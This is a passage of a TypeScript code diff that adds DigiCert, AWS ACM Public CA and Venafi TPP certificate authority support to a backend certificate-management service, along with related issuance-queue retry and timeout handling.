notAfter β€” validity is fixed at ${AWS_ACM_CERTIFICATE_VALIDITY_DAYS} days from issuance.` + }); + } + } +}; + +export const mapCertKeyAlgorithmToAcm = (keyAlgorithm: CertKeyAlgorithm) => { + switch (keyAlgorithm) { + case CertKeyAlgorithm.RSA_2048: + return "RSA_2048"; + case CertKeyAlgorithm.ECDSA_P256: + return "EC_prime256v1"; + case CertKeyAlgorithm.ECDSA_P384: + return "EC_secp384r1"; + default: + throw new BadRequestError({ + message: `AWS ACM only supports RSA_2048, EC_prime256v1, and EC_secp384r1 key algorithms. Received: ${keyAlgorithm as string}` + }); + } +}; + +// ACM's ExportCertificate passphrase must be 4-128 chars and cannot contain #, $, or %. +const generateAcmPassphraseInternal = customAlphabet( + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", + 32 +); +export const generateAcmPassphrase = (): string => generateAcmPassphraseInternal(); + +// Strip hyphens from the certificate UUID to produce a 32-char token that +// satisfies AWS's IdempotencyToken constraints (max 32 chars, alphanumeric). +export const buildIdempotencyToken = (certificateId: string) => certificateId.split("-").join("").slice(0, 32); diff --git a/backend/src/services/certificate-authority/certificate-authority-enums.ts b/backend/src/services/certificate-authority/certificate-authority-enums.ts index 7b56dc1bb0e..082017f1966 100644 --- a/backend/src/services/certificate-authority/certificate-authority-enums.ts +++ b/backend/src/services/certificate-authority/certificate-authority-enums.ts @@ -2,7 +2,10 @@ export enum CaType { INTERNAL = "internal", ACME = "acme", AZURE_AD_CS = "azure-ad-cs", - AWS_PCA = "aws-pca" + AWS_PCA = "aws-pca", + DIGICERT = "digicert", + AWS_ACM_PUBLIC_CA = "aws-acm-public-ca", + VENAFI_TPP = "venafi-tpp" } export enum InternalCaType { diff --git a/backend/src/services/certificate-authority/certificate-authority-maps.ts b/backend/src/services/certificate-authority/certificate-authority-maps.ts index 0fc093a1a3f..460a2d7080c 100644 --- a/backend/src/services/certificate-authority/certificate-authority-maps.ts +++ b/backend/src/services/certificate-authority/certificate-authority-maps.ts @@ -4,7 +4,10 @@ export const CERTIFICATE_AUTHORITIES_TYPE_MAP: Record = { [CaType.INTERNAL]: "Internal", [CaType.ACME]: "ACME-compatible CA", [CaType.AZURE_AD_CS]: "Active Directory Certificate Service", - [CaType.AWS_PCA]: "AWS Private Certificate Authority" + [CaType.AWS_PCA]: "AWS Private Certificate Authority", + [CaType.DIGICERT]: "DigiCert", + [CaType.AWS_ACM_PUBLIC_CA]: "AWS ACM Public CA", + [CaType.VENAFI_TPP]: "Venafi Trust Protection Platform" }; export const CERTIFICATE_AUTHORITIES_CAPABILITIES_MAP: Record = { @@ -19,7 +22,22 @@ export const CERTIFICATE_AUTHORITIES_CAPABILITIES_MAP: Record; @@ -77,7 +107,7 @@ type TCertificateAuthorityServiceFactoryDep = { internalCertificateAuthorityService: TInternalCertificateAuthorityServiceFactory; projectDAL: Pick; permissionService: Pick; - certificateDAL: Pick; + certificateDAL: Pick; certificateBodyDAL: Pick; certificateSecretDAL: Pick; kmsService: Pick< @@ -87,7 +117,13 @@ type TCertificateAuthorityServiceFactoryDep = { pkiSubscriberDAL: Pick; pkiSyncDAL: Pick; pkiSyncQueue: Pick; - certificateProfileDAL?: Pick; + certificateProfileDAL?: Pick; + certificateRequestDAL: Pick< + TCertificateRequestDALFactory, + "findById" | "updateById" | "updateStatus" | "attachCertificate" + >; + resourceMetadataDAL: Pick; + gatewayV2Service: Pick; }; export type TCertificateAuthorityServiceFactory = ReturnType; @@ -107,7 +143,10 @@ export const certificateAuthorityServiceFactory = ({ pkiSubscriberDAL, pkiSyncDAL, pkiSyncQueue, - certificateProfileDAL + certificateProfileDAL, + certificateRequestDAL, + resourceMetadataDAL, + gatewayV2Service }: TCertificateAuthorityServiceFactoryDep) => { const acmeFns = AcmeCertificateAuthorityFns({ appConnectionDAL, @@ -141,6 +180,20 @@ export const certificateAuthorityServiceFactory = ({ certificateProfileDAL }); + const venafiTppFns = VenafiTppCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL, + certificateProfileDAL, + gatewayV2Service + }); + const awsPcaFns = AwsPcaCertificateAuthorityFns({ appConnectionDAL, appConnectionService, @@ -154,6 +207,30 @@ export const certificateAuthorityServiceFactory = ({ certificateProfileDAL }); + const digicertFns = DigiCertCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL + }); + const awsAcmPublicCaFns = AwsAcmPublicCaCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL, + certificateProfileDAL + }); + const createCertificateAuthority = async ( { type, projectId, name, configuration, status }: TCreateCertificateAuthorityDTO, actor: OrgServiceActor @@ -227,6 +304,34 @@ export const certificateAuthorityServiceFactory = ({ }); } + if (type === CaType.DIGICERT) { + return digicertFns.createCertificateAuthority({ + name, + projectId, + configuration: configuration as TCreateDigiCertCertificateAuthorityDTO["configuration"], + status, + actor + }); + } + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return awsAcmPublicCaFns.createCertificateAuthority({ + name, + projectId, + configuration: configuration as TCreateAwsAcmPublicCaCertificateAuthorityDTO["configuration"], + status, + actor + }); + } + if (type === CaType.VENAFI_TPP) { + return venafiTppFns.createCertificateAuthority({ + name, + projectId, + configuration: configuration as TCreateVenafiTppCertificateAuthorityDTO["configuration"], + status, + actor + }); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -289,6 +394,18 @@ export const certificateAuthorityServiceFactory = ({ return castDbEntryToAwsPcaCertificateAuthority(certificateAuthority); } + if (type === CaType.DIGICERT) { + return castDbEntryToDigiCertCertificateAuthority(certificateAuthority); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return castDbEntryToAwsAcmPublicCaCertificateAuthority(certificateAuthority); + } + + if (type === CaType.VENAFI_TPP) { + return castDbEntryToVenafiTppCertificateAuthority(certificateAuthority); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -356,6 +473,18 @@ export const certificateAuthorityServiceFactory = ({ return castDbEntryToAwsPcaCertificateAuthority(certificateAuthority); } + if (type === CaType.DIGICERT) { + return castDbEntryToDigiCertCertificateAuthority(certificateAuthority); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return castDbEntryToAwsAcmPublicCaCertificateAuthority(certificateAuthority); + } + + if (type === CaType.VENAFI_TPP) { + return castDbEntryToVenafiTppCertificateAuthority(certificateAuthority); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -418,6 +547,18 @@ export const certificateAuthorityServiceFactory = ({ return awsPcaFns.listCertificateAuthorities({ projectId, permissionFilters }); } + if (type === CaType.DIGICERT) { + return digicertFns.listCertificateAuthorities({ projectId, permissionFilters }); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return awsAcmPublicCaFns.listCertificateAuthorities({ projectId, permissionFilters }); + } + + if (type === CaType.VENAFI_TPP) { + return venafiTppFns.listCertificateAuthorities({ projectId, permissionFilters }); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -507,6 +648,36 @@ export const certificateAuthorityServiceFactory = ({ }); } + if (type === CaType.DIGICERT) { + return digicertFns.updateCertificateAuthority({ + id: certificateAuthority.id, + configuration: configuration as TUpdateDigiCertCertificateAuthorityDTO["configuration"], + actor, + status, + name + }); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return awsAcmPublicCaFns.updateCertificateAuthority({ + id: certificateAuthority.id, + configuration: configuration as TUpdateAwsAcmPublicCaCertificateAuthorityDTO["configuration"], + actor, + status, + name + }); + } + + if (type === CaType.VENAFI_TPP) { + return venafiTppFns.updateCertificateAuthority({ + id: certificateAuthority.id, + configuration: configuration as TUpdateVenafiTppCertificateAuthorityDTO["configuration"], + actor, + status, + name + }); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -570,6 +741,18 @@ export const certificateAuthorityServiceFactory = ({ return castDbEntryToAwsPcaCertificateAuthority(certificateAuthority); } + if (type === CaType.DIGICERT) { + return castDbEntryToDigiCertCertificateAuthority(certificateAuthority); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return castDbEntryToAwsAcmPublicCaCertificateAuthority(certificateAuthority); + } + + if (type === CaType.VENAFI_TPP) { + return castDbEntryToVenafiTppCertificateAuthority(certificateAuthority); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -662,6 +845,36 @@ export const certificateAuthorityServiceFactory = ({ }); } + if (type === CaType.DIGICERT) { + return digicertFns.updateCertificateAuthority({ + id: certificateAuthority.id, + configuration: configuration as TUpdateDigiCertCertificateAuthorityDTO["configuration"], + actor, + status, + name + }); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return awsAcmPublicCaFns.updateCertificateAuthority({ + id: certificateAuthority.id, + configuration: configuration as TUpdateAwsAcmPublicCaCertificateAuthorityDTO["configuration"], + actor, + status, + name + }); + } + + if (type === CaType.VENAFI_TPP) { + return venafiTppFns.updateCertificateAuthority({ + id: certificateAuthority.id, + configuration: configuration as TUpdateVenafiTppCertificateAuthorityDTO["configuration"], + actor, + status, + name + }); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -731,6 +944,18 @@ export const certificateAuthorityServiceFactory = ({ return castDbEntryToAwsPcaCertificateAuthority(certificateAuthority); } + if (type === CaType.DIGICERT) { + return castDbEntryToDigiCertCertificateAuthority(certificateAuthority); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return castDbEntryToAwsAcmPublicCaCertificateAuthority(certificateAuthority); + } + + if (type === CaType.VENAFI_TPP) { + return castDbEntryToVenafiTppCertificateAuthority(certificateAuthority); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -840,11 +1065,95 @@ export const certificateAuthorityServiceFactory = ({ return; } + if (caType === CaType.DIGICERT) { + await digicertFns.revokeCertificate({ caId, serialNumber, reason }); + return; + } + + if (caType === CaType.AWS_ACM_PUBLIC_CA) { + await awsAcmPublicCaFns.revokeCertificate({ caId, serialNumber, reason }); + return; + } + throw new BadRequestError({ message: `Certificate revocation via CA service is not supported for CA type "${caType}"` }); }; + const triggerCertificateRequestValidation = async ({ + actor, + actorId, + actorAuthMethod, + actorOrgId, + certificateRequestId + }: Omit & { certificateRequestId: string }) => { + const certificateRequest = await certificateRequestDAL.findById(certificateRequestId); + if (!certificateRequest) { + throw new NotFoundError({ message: "Certificate request not found" }); + } + + const { permission } = await permissionService.getProjectPermission({ + actor, + actorId, + projectId: certificateRequest.projectId, + actorAuthMethod, + actorOrgId, + actionProjectType: ActionProjectType.CertificateManager + }); + + const requestMetadata = (await resourceMetadataDAL.find({ certificateRequestId: certificateRequest.id })).map( + ({ key, value }) => ({ key, value: value || "" }) + ); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionCertificateActions.Edit, + subject(ProjectPermissionSub.Certificates, { + commonName: certificateRequest.commonName ?? undefined, + altNames: Array.isArray(certificateRequest.altNames) + ? (certificateRequest.altNames as { type: string; value: string }[]).map((san) => san.value) + : undefined, + metadata: requestMetadata + }) + ); + + if (certificateRequest.status !== CertificateRequestStatus.PENDING_VALIDATION) { + throw new BadRequestError({ + message: `Certificate request is not pending validation [status=${certificateRequest.status}]` + }); + } + + if (!certificateRequest.caId) { + throw new BadRequestError({ message: "Certificate request is not linked to a certificate authority" }); + } + + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(certificateRequest.caId); + if (ca.externalCa?.type !== CaType.DIGICERT) { + throw new BadRequestError({ + message: `Manual validation is only supported for DigiCert certificate authorities [caType=${ca.externalCa?.type}]` + }); + } + + const result = await processDigiCertPendingValidationRequest( + { + certificateAuthorityDAL, + appConnectionDAL, + kmsService, + certificateRequestDAL, + certificateRequestService: { + updateCertificateRequestStatus: async ({ certificateRequestId: id, status, errorMessage }) => + certificateRequestDAL.updateStatus(id, status, errorMessage), + attachCertificateToRequest: async ({ certificateRequestId: id, certificateId }) => + certificateRequestDAL.attachCertificate(id, certificateId) + }, + resourceMetadataDAL, + digicertFns + }, + certificateRequest + ); + + return { ...result, projectId: certificateRequest.projectId }; + }; + return { createCertificateAuthority, findCertificateAuthorityById, @@ -856,6 +1165,7 @@ export const certificateAuthorityServiceFactory = ({ getCaById, deprecatedUpdateCertificateAuthority, deprecatedDeleteCertificateAuthority, - revokeCertificate + revokeCertificate, + triggerCertificateRequestValidation }; }; diff --git a/backend/src/services/certificate-authority/certificate-authority-types.ts b/backend/src/services/certificate-authority/certificate-authority-types.ts index d3eb1257a97..1d6fc551c41 100644 --- a/backend/src/services/certificate-authority/certificate-authority-types.ts +++ b/backend/src/services/certificate-authority/certificate-authority-types.ts @@ -1,4 +1,8 @@ import { TAcmeCertificateAuthority, TAcmeCertificateAuthorityInput } from "./acme/acme-certificate-authority-types"; +import { + TAwsAcmPublicCaCertificateAuthority, + TCreateAwsAcmPublicCaCertificateAuthorityDTO +} from "./aws-acm-public-ca/aws-acm-public-ca-certificate-authority-types"; import { TAwsPcaCertificateAuthority, TCreateAwsPcaCertificateAuthorityDTO @@ -8,22 +12,36 @@ import { TCreateAzureAdCsCertificateAuthorityDTO } from "./azure-ad-cs/azure-ad-cs-certificate-authority-types"; import { CaType } from "./certificate-authority-enums"; +import { + TCreateDigiCertCertificateAuthorityDTO, + TDigiCertCertificateAuthority +} from "./digicert/digicert-certificate-authority-types"; import { TInternalCertificateAuthority, TInternalCertificateAuthorityInput } from "./internal/internal-certificate-authority-types"; +import { + TCreateVenafiTppCertificateAuthorityDTO, + TVenafiTppCertificateAuthority +} from "./venafi-tpp/venafi-tpp-certificate-authority-types"; export type TCertificateAuthority = | TInternalCertificateAuthority | TAcmeCertificateAuthority | TAzureAdCsCertificateAuthority - | TAwsPcaCertificateAuthority; + | TAwsPcaCertificateAuthority + | TDigiCertCertificateAuthority + | TAwsAcmPublicCaCertificateAuthority + | TVenafiTppCertificateAuthority; export type TCertificateAuthorityInput = | TInternalCertificateAuthorityInput | TAcmeCertificateAuthorityInput | TCreateAzureAdCsCertificateAuthorityDTO - | TCreateAwsPcaCertificateAuthorityDTO; + | TCreateAwsPcaCertificateAuthorityDTO + | TCreateDigiCertCertificateAuthorityDTO + | TCreateAwsAcmPublicCaCertificateAuthorityDTO + | TCreateVenafiTppCertificateAuthorityDTO; export type TCreateCertificateAuthorityDTO = Omit; diff --git a/backend/src/services/certificate-authority/certificate-issuance-queue.ts b/backend/src/services/certificate-authority/certificate-issuance-queue.ts index aae303ca7ce..0ea573d2be7 100644 --- a/backend/src/services/certificate-authority/certificate-issuance-queue.ts +++ b/backend/src/services/certificate-authority/certificate-issuance-queue.ts @@ -1,5 +1,7 @@ import acme from "acme-client"; +import { UnrecoverableError } from "bullmq"; +import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; import { crypto } from "@app/lib/crypto/cryptography"; import { NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; @@ -13,12 +15,15 @@ import { import { TCertificateProfileDALFactory } from "@app/services/certificate-profile/certificate-profile-dal"; import { TKmsServiceFactory } from "@app/services/kms/kms-service"; import { TProjectDALFactory } from "@app/services/project/project-dal"; +import { getProjectKmsCertificateKeyId } from "@app/services/project/project-fns"; import { TAppConnectionDALFactory } from "../app-connection/app-connection-dal"; import { TAppConnectionServiceFactory } from "../app-connection/app-connection-service"; import { TCertificateBodyDALFactory } from "../certificate/certificate-body-dal"; import { TCertificateSecretDALFactory } from "../certificate/certificate-secret-dal"; import { CertKeyAlgorithm } from "../certificate-common/certificate-constants"; +import { DigiCertExternalMetadataSchema } from "../certificate-common/external-metadata-schemas"; +import { TCertificateRequestDALFactory } from "../certificate-request/certificate-request-dal"; import { TCertificateRequestServiceFactory } from "../certificate-request/certificate-request-service"; import { CertificateRequestStatus } from "../certificate-request/certificate-request-types"; import { TPkiAlertV2QueueServiceFactory } from "../pki-alert-v2/pki-alert-v2-queue"; @@ -28,13 +33,24 @@ import { TPkiSyncDALFactory } from "../pki-sync/pki-sync-dal"; import { TPkiSyncQueueFactory } from "../pki-sync/pki-sync-queue"; import { TResourceMetadataDALFactory } from "../resource-metadata/resource-metadata-dal"; import { copyMetadataFromRequestToCertificate } from "../resource-metadata/resource-metadata-fns"; +import { + ACME_ORDER_TIMEOUT_MS, + AcmeOrderTimeoutError, + AcmeRateLimitError, + isAcmeRateLimitError, + runWithAcmeOrderTimeout +} from "./acme/acme-certificate-authority-errors"; import { AcmeCertificateAuthorityFns } from "./acme/acme-certificate-authority-fns"; +import { AcmPendingError } from "./aws-acm-public-ca/aws-acm-public-ca-certificate-authority-errors"; +import { AwsAcmPublicCaCertificateAuthorityFns } from "./aws-acm-public-ca/aws-acm-public-ca-certificate-authority-fns"; import { AwsPcaCertificateAuthorityFns } from "./aws-pca/aws-pca-certificate-authority-fns"; import { AzureAdCsCertificateAuthorityFns } from "./azure-ad-cs/azure-ad-cs-certificate-authority-fns"; import { TCertificateAuthorityDALFactory } from "./certificate-authority-dal"; import { CaType } from "./certificate-authority-enums"; import { keyAlgorithmToAlgCfg } from "./certificate-authority-fns"; +import { DigiCertCertificateAuthorityFns } from "./digicert/digicert-certificate-authority-fns"; import { TExternalCertificateAuthorityDALFactory } from "./external-certificate-authority-dal"; +import { VenafiTppCertificateAuthorityFns } from "./venafi-tpp/venafi-tpp-certificate-authority-fns"; const base64UrlToBase64 = (base64url: string): string => { let base64 = base64url.replace(/-/g, "+").replace(/_/g, "/"); @@ -69,6 +85,7 @@ export type TIssueCertificateFromProfileJobData = { certificateId: string; profileId: string; caId: string; + caType?: CaType; commonName?: string; altNames?: Array<{ type: string; value: string }>; ttl: string; @@ -104,13 +121,15 @@ type TCertificateIssuanceQueueFactoryDep = { pkiSubscriberDAL: Pick; pkiSyncDAL: Pick; pkiSyncQueue: Pick; - certificateProfileDAL?: Pick; + certificateProfileDAL?: Pick; certificateRequestService?: Pick< TCertificateRequestServiceFactory, "attachCertificateToRequest" | "updateCertificateRequestStatus" >; + certificateRequestDAL?: Pick; resourceMetadataDAL: Pick; pkiAlertV2Queue?: Pick; + gatewayV2Service: Pick; }; export type TCertificateIssuanceQueueFactory = ReturnType; @@ -131,8 +150,10 @@ export const certificateIssuanceQueueFactory = ({ pkiSyncQueue, certificateProfileDAL, certificateRequestService, + certificateRequestDAL, resourceMetadataDAL, - pkiAlertV2Queue + pkiAlertV2Queue, + gatewayV2Service }: TCertificateIssuanceQueueFactoryDep) => { const acmeFns = AcmeCertificateAuthorityFns({ appConnectionDAL, @@ -179,6 +200,45 @@ export const certificateIssuanceQueueFactory = ({ certificateProfileDAL }); + const digicertFns = DigiCertCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL + }); + + const awsAcmPublicCaFns = AwsAcmPublicCaCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL, + certificateProfileDAL + }); + + const venafiTppFns = VenafiTppCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL, + certificateProfileDAL, + gatewayV2Service + }); + /** * Queue a certificate issuance job. */ @@ -186,6 +246,7 @@ export const certificateIssuanceQueueFactory = ({ certificateId, profileId, caId, + caType, commonName, altNames, ttl, @@ -207,6 +268,7 @@ export const certificateIssuanceQueueFactory = ({ certificateId, profileId, caId, + caType, commonName, altNames, ttl, @@ -225,13 +287,16 @@ export const certificateIssuanceQueueFactory = ({ locality }; + // ACM DNS validation can take 5–30 minutes; the function is fully idempotent via + // IdempotencyToken, so we poll longer with a fixed backoff instead of exponential. + const queueOpts = + caType === CaType.AWS_ACM_PUBLIC_CA + ? { attempts: 30, backoff: { type: "fixed" as const, delay: 60000 } } + : { attempts: 3, backoff: { type: "exponential" as const, delay: 5000 } }; + await queueService.queue(QueueName.CertificateIssuance, QueueJobs.CaIssueCertificateFromProfile, jobData, { jobId: `certificate-issuance-${certificateId}`, - attempts: 3, - backoff: { - type: "exponential", - delay: 5000 - } + ...queueOpts }); }; @@ -295,21 +360,35 @@ export const certificateIssuanceQueueFactory = ({ certificateCsr = generatedCsr.toString(); } - const acmeResult = await acmeFns.orderCertificateFromProfile({ - caId, - profileId, - commonName: commonName || "", - altNames: altNames?.map((san) => san.value) || [], - csr: Buffer.from(certificateCsr), - csrPrivateKey: skLeaf, - keyUsages: keyUsages as CertKeyUsage[], - extendedKeyUsages: extendedKeyUsages as CertExtendedKeyUsage[], - ttl, - signatureAlgorithm, - keyAlgorithm, - isRenewal, - originalCertificateId - }); + let acmeResult; + try { + acmeResult = await runWithAcmeOrderTimeout( + (signal) => + acmeFns.orderCertificateFromProfile({ + caId, + profileId, + commonName: commonName || "", + altNames: altNames?.map((san) => san.value) || [], + csr: Buffer.from(certificateCsr), + csrPrivateKey: skLeaf, + keyUsages: keyUsages as CertKeyUsage[], + extendedKeyUsages: extendedKeyUsages as CertExtendedKeyUsage[], + ttl, + signatureAlgorithm, + keyAlgorithm, + isRenewal, + originalCertificateId, + abortSignal: signal + }), + ACME_ORDER_TIMEOUT_MS + ); + } catch (acmeError) { + if (isAcmeRateLimitError(acmeError)) { + const message = acmeError instanceof Error ? acmeError.message : String(acmeError); + throw new AcmeRateLimitError(`ACME CA rate-limited the order: ${message}`); + } + throw acmeError; + } if (certificateRequestId && certificateRequestService && acmeResult?.id) { try { @@ -396,6 +475,62 @@ export const certificateIssuanceQueueFactory = ({ certificateId: azureResult.certificateId }); + logger.info(`Certificate attached to request [certificateRequestId=${certificateRequestId}]`); + } catch (attachError) { + logger.error( + attachError, + `Failed to attach certificate to request [certificateRequestId=${certificateRequestId}]` + ); + try { + await certificateRequestService.updateCertificateRequestStatus({ + certificateRequestId, + status: CertificateRequestStatus.FAILED, + errorMessage: `Failed to attach certificate: ${attachError instanceof Error ? attachError.message : String(attachError)}` + }); + } catch (statusUpdateError) { + logger.error( + statusUpdateError, + `Failed to update certificate request status [certificateRequestId=${certificateRequestId}]` + ); + } + } + } + } else if (ca.externalCa?.type === CaType.AWS_ACM_PUBLIC_CA) { + const acmParams = { + caId, + profileId, + certificateId, + commonName: commonName || "", + altNames: (altNames || []) as Array<{ type: CertSubjectAlternativeNameType; value: string }>, + keyUsages, + extendedKeyUsages, + validity: { ttl }, + signatureAlgorithm, + keyAlgorithm: keyAlgorithm as CertKeyAlgorithm, + isRenewal, + originalCertificateId, + ...(csr && { csr }), + organization, + organizationalUnit, + country, + state, + locality + }; + + const acmResult = await awsAcmPublicCaFns.orderCertificateFromProfile(acmParams); + + if (certificateRequestId && certificateRequestService && acmResult?.certificateId) { + try { + await certificateRequestService.attachCertificateToRequest({ + certificateRequestId, + certificateId: acmResult.certificateId + }); + + await copyMetadataFromRequestToCertificate(resourceMetadataDAL, { + certificateRequestId, + certificateId: acmResult.certificateId + }); + logger.info(`Certificate attached to request [certificateRequestId=${certificateRequestId}]`); } catch (attachError) { logger.error( @@ -451,6 +586,164 @@ export const certificateIssuanceQueueFactory = ({ certificateId: awsPcaResult.certificateId }); + logger.info(`Certificate attached to request [certificateRequestId=${certificateRequestId}]`); + } catch (attachError) { + logger.error( + attachError, + `Failed to attach certificate to request [certificateRequestId=${certificateRequestId}]` + ); + try { + await certificateRequestService.updateCertificateRequestStatus({ + certificateRequestId, + status: CertificateRequestStatus.FAILED, + errorMessage: `Failed to attach certificate: ${attachError instanceof Error ? attachError.message : String(attachError)}` + }); + } catch (statusUpdateError) { + logger.error( + statusUpdateError, + `Failed to update certificate request status [certificateRequestId=${certificateRequestId}]` + ); + } + } + } + } else if (ca.externalCa?.type === CaType.DIGICERT) { + if (!certificateRequestId || !certificateRequestDAL) { + throw new NotFoundError({ + message: "DigiCert issuance requires a certificate request and request DAL" + }); + } + + let renewalOfOrderId: number | undefined; + if (isRenewal && originalCertificateId) { + const originalCert = await certificateDAL.findById(originalCertificateId); + const parsedMetadata = DigiCertExternalMetadataSchema.safeParse(originalCert?.externalMetadata); + if (parsedMetadata.success) { + renewalOfOrderId = parsedMetadata.data.orderId; + } else { + logger.warn( + `DigiCert renewal requested but previous certificate has no DigiCert order reference in externalMetadata β€” falling back to a new order [originalCertificateId=${originalCertificateId}]` + ); + } + } + + const digicertResult = await digicertFns.orderCertificateFromProfile({ + caId, + commonName: commonName || "", + altNames: altNames?.map((san) => san.value) || [], + signatureAlgorithm, + keyAlgorithm: keyAlgorithm as CertKeyAlgorithm, + ttl, + ...(csr && { csr }), + ...(renewalOfOrderId !== undefined && { renewalOfOrderId }) + }); + + let encryptedPrivateKey: Buffer | undefined; + if (digicertResult.privateKey) { + const certificateManagerKmsId = await getProjectKmsCertificateKeyId({ + projectId: ca.projectId, + projectDAL, + kmsService + }); + const kmsEncryptor = await kmsService.encryptWithKmsKey({ kmsId: certificateManagerKmsId }); + const { cipherTextBlob } = await kmsEncryptor({ plainText: Buffer.from(digicertResult.privateKey) }); + encryptedPrivateKey = cipherTextBlob; + } + + const metadataWithRenewal = { + ...digicertResult.metadata, + digicert: { + ...digicertResult.metadata.digicert, + ...(isRenewal && originalCertificateId ? { isRenewal: true, originalCertificateId } : {}) + } + }; + + await certificateRequestDAL.updateById(certificateRequestId, { + status: CertificateRequestStatus.PENDING_VALIDATION, + metadata: JSON.stringify(metadataWithRenewal), + ...(encryptedPrivateKey && { encryptedPrivateKey }) + }); + + if (digicertResult.immediateCertificateId) { + try { + const { certificateId: attachedCertificateId } = await digicertFns.fetchAndAttachIssuedCertificate({ + caId, + certificateRequest: { + id: certificateRequestId, + profileId, + commonName: commonName || "", + altNames: altNames?.map((san) => san.value).join(",") ?? null, + keyUsages: keyUsages ?? null, + extendedKeyUsages: extendedKeyUsages ?? null, + keyAlgorithm, + signatureAlgorithm + }, + digicertCertificateId: digicertResult.immediateCertificateId, + digicertOrderId: digicertResult.orderId, + encryptedPrivateKey, + isRenewal, + originalCertificateId + }); + + if (certificateRequestService) { + await certificateRequestService.attachCertificateToRequest({ + certificateRequestId, + certificateId: attachedCertificateId + }); + await copyMetadataFromRequestToCertificate(resourceMetadataDAL, { + certificateRequestId, + certificateId: attachedCertificateId + }); + } + + logger.info( + `DigiCert order issued immediately (pre-validated domains), attached certificate [certificateRequestId=${certificateRequestId}] [certificateId=${attachedCertificateId}]` + ); + } catch (finaliseError) { + logger.error( + finaliseError, + `DigiCert immediate finalisation failed, will be retried by polling queue [certificateRequestId=${certificateRequestId}]` + ); + } + } else { + logger.info( + `DigiCert order placed, awaiting validation [certificateRequestId=${certificateRequestId}] [orderId=${digicertResult.metadata.digicert.orderId}]` + ); + } + } else if (ca.externalCa?.type === CaType.VENAFI_TPP) { + const venafiTppParams = { + caId, + profileId, + commonName: commonName || "", + altNames: (altNames || []) as Array<{ type: CertSubjectAlternativeNameType; value: string }>, + keyUsages: keyUsages as CertKeyUsage[], + extendedKeyUsages: extendedKeyUsages as CertExtendedKeyUsage[], + validity: { ttl }, + signatureAlgorithm, + keyAlgorithm: keyAlgorithm as CertKeyAlgorithm, + isRenewal, + originalCertificateId, + ...(csr && { csr }), + organization, + organizationalUnit, + country, + state, + locality + }; + + const venafiTppResult = await venafiTppFns.orderCertificateFromProfile(venafiTppParams); + + if (certificateRequestId && certificateRequestService && venafiTppResult?.certificateId) { + try { + await certificateRequestService.attachCertificateToRequest({ + certificateRequestId, + certificateId: venafiTppResult.certificateId + }); + + await copyMetadataFromRequestToCertificate(resourceMetadataDAL, { + certificateRequestId, + certificateId: venafiTppResult.certificateId + }); + logger.info(`Certificate attached to request [certificateRequestId=${certificateRequestId}]`); } catch (attachError) { logger.error( @@ -487,14 +780,27 @@ export const certificateIssuanceQueueFactory = ({ logger.debug("Failed to queue PKI alert event for async certificate issuance"); } } catch (error: unknown) { + // AcmPendingError signals that an ACM operation (DNS validation, renewal, export) is still + // in flight. Don't mark the request as FAILED on every poll β€” only after the queue exhausts attempts. + const isRetryable = error instanceof AcmPendingError; + if (isRetryable) { + logger.info( + `Certificate issuance pending ACM operation β€” will retry [certificateId=${certificateId}] [caId=${caId}]` + ); + throw error; + } + logger.error(error, `Certificate issuance job failed for [certificateId=${certificateId}] [caId=${caId}]`); + const isAcmeTerminal = error instanceof AcmeOrderTimeoutError || error instanceof AcmeRateLimitError; + if (certificateRequestId && certificateRequestService) { try { + const errorMessage = error instanceof Error ? error.message : String(error); await certificateRequestService.updateCertificateRequestStatus({ certificateRequestId, status: CertificateRequestStatus.FAILED, - errorMessage: `Certificate issuance failed: ${error instanceof Error ? error.message : String(error)}` + errorMessage: isAcmeTerminal ? errorMessage : `Certificate issuance failed: ${errorMessage}` }); logger.info(`Updated certificate request ${certificateRequestId} status to failed due to issuance error`); } catch (statusUpdateError) { @@ -505,12 +811,52 @@ export const certificateIssuanceQueueFactory = ({ } } + // For ACM's 30-attempt queue, wrap non-retryable errors so BullMQ stops retrying immediately. + // Other CAs keep default retry behavior (3 attempts is short enough that running through them is fine). + if (data.caType === CaType.AWS_ACM_PUBLIC_CA || isAcmeTerminal) { + const message = error instanceof Error ? error.message : String(error); + const wrapped = new 